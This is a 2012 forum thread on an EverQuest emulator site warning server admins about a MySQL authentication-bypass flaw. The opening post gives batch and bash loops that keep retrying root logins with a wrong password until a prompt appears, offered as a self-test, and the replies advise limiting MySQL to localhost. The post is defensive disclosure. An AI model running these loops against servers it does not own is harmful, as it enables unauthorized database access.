Go Back   EQEmulator Home > EQEmulator Forums > Development > Development::Database/World Building
Reload this Page MySQL Stupid Easy Exploit

Development::Database/World Building World Building forum, dedicated to the EQEmu MySQL Database. Post partial/complete databases for spawns, items, etc.

Reply
 
Thread Tools Display Modes
  #1  
Old 06-12-2012, 02:33 PM
Hateborne
Hill Giant
  
Join Date: May 2010
Posts: 125
Default MySQL Stupid Easy Exploit
Just throwing this out there, a minor exploit has come up for MySQL.

It affects very few setups from my understanding, but I am still passing this along.

http://isc.sans.edu/diary.html?storyid=13432
http://thehackernews.com/2012/06/cve...ous-mysql.html

Basically, with access to the machine (either locally or remotely), affected versions of MySQL are trivially easy to open up. Supposedly 1/256 chance to get in, which is disgustingly high.


To test for this on Windows, take the three command below and save into a bat file:
Code:
:Start
mysql -u root --password=lolwut 2>NUL
goto Start
To test for this on Linux, take ONE of these two and pass into terminal:
Code:
for i in `seq 1 1000`; do mysql -u root --password=bad -h 127.0.0.1 2>/dev/null; done
Code:
while true; do mysql -u root --password=bad; done
If any of the tests above bring up the mysql prompt (mysql>), your machine is vulnerable. Patch up or disable all remote access to database until a patch is made available.

-Hate




EDIT: I understand this is probably against the rules to post such exploits, but seeing as how I do not have an easy way to reach every single server admin(s)...this will have to do. If it's too much info, please copy this and pass it to every EQEMU server admin you can find, then delete the code sections.
Reply With Quote
  #2  
Old 06-12-2012, 10:16 PM
pfyon's Avatar
pfyon
Discordant
  
Join Date: Mar 2009
Location: Ottawa
Posts: 495
Default
It's a good time to point out to new server admins that you should restrict access to your server to a limited set of IPs. For many servers, this means localhost only. If you go and open up port 3306 and tell mysql to listen on a public interface, you open up your server to an exploit like this.

The default ubuntu install has mysql listen on localhost only (probably debian too). I'm not sure about windows.
Reply With Quote
  #3  
Old 06-13-2012, 04:50 PM
Hateborne
Hill Giant
  
Join Date: May 2010
Posts: 125
Default
Quote:
Originally Posted by pfyon View Post
It's a good time to point out to new server admins that you should restrict access to your server to a limited set of IPs. For many servers, this means localhost only. If you go and open up port 3306 and tell mysql to listen on a public interface, you open up your server to an exploit like this.

The default ubuntu install has mysql listen on localhost only (probably debian too). I'm not sure about windows.
This brings up a good point. If the MySQL access is restricted to localhost (127.0.0.1) only, this exploit (and others) can only be run if the baddy has access to the machine physically (or has broken in through another exploit/vulnerability).

-Hate
Reply With Quote
Reply

« Previous Thread | Next Thread »

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts
BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Forum Jump

   

All times are GMT -4. The time now is 11:55 AM.

EQEmulator - Archive - Top

 

Everquest is a registered trademark of Daybreak Game Company LLC.
EQEmulator is not associated or affiliated in any way with Daybreak Game Company LLC.
Except where otherwise noted, this site is licensed under a Creative Commons License.
       
Powered by vBulletin®, Copyright ©2000 - 2024, Jelsoft Enterprises Ltd.
Template by Bluepearl Design and vBulletin Templates - Ver3.3